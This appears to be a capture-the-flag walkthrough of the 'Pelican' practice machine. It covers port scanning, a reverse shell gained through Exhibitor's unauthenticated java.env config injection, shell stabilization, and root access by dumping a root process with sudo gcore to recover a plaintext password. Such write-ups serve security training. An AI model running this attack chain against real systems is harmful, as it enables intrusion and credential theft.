Pelican
Enumeration:
Port Scanning:
As always we are going to start with nmap scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 07:31 +03
Nmap scan report for 192.168.222.98 07:57:38 [36/216]
Host is up, received reset ttl 61 (0.11s latency).
Scanned at 2025-10-02 07:31:05 +03 for 367s
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bd
D5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyx
Yuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
| 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 61 CUPS 2.2
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-title: Forbidden - CUPS v2.2.10
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bd
D5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyx
Yuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
| 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp open http syn-ack ttl 61 Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp open http syn-ack ttl 61 nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://192.168.222.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
46295/tcp open java-rmi syn-ack ttl 61 Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernelWe have samba running on port 445, and ssh running on 22 and 2222, and java rmi, and multiple web server running on different ports.
Inspect them one by one:
I skipped palying with it to try to find any other low-hanging fruite on other applications.
Also nothing here.
I searched using searchsploit for vulnerabilities related to the running services and its versions, nothing really interesting.
HTTP (8080):
We have exhibitor for zookeeper running on port 8080:
Exploitation:
Reverse shell as charles:
I searched online for any public exploits.
We will find that it is vulnerable to RCE.
There is no authentication process to at least reduce its severity, also it accepts user input without any sanitization in java.env script field of the application.
We can use this script to help us execute the vulnerability:
Or we can exploit it ourselves:
We will navigate to config, and we will find the desired field:
We will check editing button to allow us edit the fields, I will add a nc reverse shell:
Then click on commit:
Click on all at once:
Before we click ok, we need to start our netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...Then click ok.
We will get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.222.98] 43428
id
uid=1000(charles) gid=1000(charles) groups=1000(charles)Stabilize it so we can use commands such as sudo, etc.
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:/opt/zookeeper$ export TERM=xterm
export TERM=xterm
charles@pelican:/opt/zookeeper$ ^Z
zsh: suspended nc -nlvp 1337
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 1337
charles@pelican:/opt/zookeeper$ stty rows 43 cols 172Privilege Escalation:
After doing some enumeration, we will find that we can run a binary with sudo command as root:
charles@pelican:/$ sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcoreSearch online to understand what this tools does:
So we can dump in some way a process via this tool.
Search for any interesting process:
charles@pelican:/$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 01:13 ? 00:00:00 /sbin/init
root 2 0 0 01:13 ? 00:00:00 [kthreadd]
<snipped>
root 483 1 0 01:13 ? 00:00:00 /usr/sbin/cups-browsed
root 490 1 0 01:13 ? 00:00:00 /usr/bin/password-store
root 491 1 0 01:13 ? 00:00:00 /usr/lib/policykit-1/polkitd --no-debugWe will find this weird program password-store running as the root user.
It seems to be storing credentials in some way.
Lets attempt to dump it using gcore:
charles@pelican:/$ sudo gcore
usage: gcore [-a] [-o filename] pidWe can output the result to a file:
charles@pelican:/zookeeper/data$ sudo gcore -o password-store 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanoslee
p.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile password-store.490
[Inferior 1 (process 490) detached]
charles@pelican:/zookeeper/data$ ls -la
total 368
drwxr-xr-x 3 charles charles 4096 Oct 2 02:02 .
drwxr-xr-x 3 charles charles 4096 Sep 10 2020 ..
-rw-r--r-- 1 charles charles 2 Oct 2 01:38 myid
-rw-r--r-- 1 root root 354448 Oct 2 02:02 password-store.490
drwxr-xr-x 2 charles charles 4096 Sep 10 2020 version-2
-rw-r--r-- 1 charles charles 5 Oct 2 01:38 zookeeper_server.pidWe dumpped it successfully.
We can confirm that this is a binary:
charles@pelican:/zookeeper/data$ file password-store.490
password-store.490: ELF 64-bit LSB core file, x86-64, version 1 (SYSV), SVR4-style, from '/usr/bin/password-store', real uid: 0, effective uid: 0, real gid: 0, effective gi
d: 0, execfn: '/usr/bin/password-store', platform: 'x86_64'Check what it contains using strings:
charles@pelican:/zookeeper/data$ strings password-store.490 | less
<snipped>
/lib/x86_64-linux-gnu/libc.so.6
/usr/bin/passwor
////////////////
/usr/bin/passwor
////////////////
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/root
/usr/bin/password-store We will find a psssword, lets check if this is still valid:
charles@pelican:/zookeeper/data$ su root
Password: ClogKingpinInning731
root@pelican:/zookeeper/data#We rooted this box.
Get the flags:
root@pelican:~# cat proof.txt
b8e860dceda73067ea8ec1b9297c314c
root@pelican:~# cat /home/charles/local.txt
8f2ee45cd931ba726fd8e0c8b2d4f2e0Last updated